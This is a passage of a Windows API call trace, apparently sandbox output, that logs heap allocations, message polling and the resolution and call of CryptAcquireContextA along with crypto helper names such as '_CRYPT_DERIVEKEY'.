dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0215.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.196] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0215.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.196] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69c28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0215.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0215.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0215.197] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0215.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0215.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0215.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0215.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b08 [0215.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0215.198] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0215.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0215.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0215.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0215.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0215.198] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0215.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0215.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0215.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0215.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0215.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0215.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0215.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0215.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0215.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0215.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0215.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0215.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0215.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0215.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0215.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0215.203] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0215.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0215.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0215.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0215.204] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0215.204] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0215.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0215.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0215.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0215.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0215.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0215.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0215.205] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.205] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0215.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.205] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.205] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.205] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0215.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0215.205] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0215.205] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.206] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.206] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0215.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0215.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0215.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0215.206] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0215.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0215.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0215.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0215.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0215.208] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, 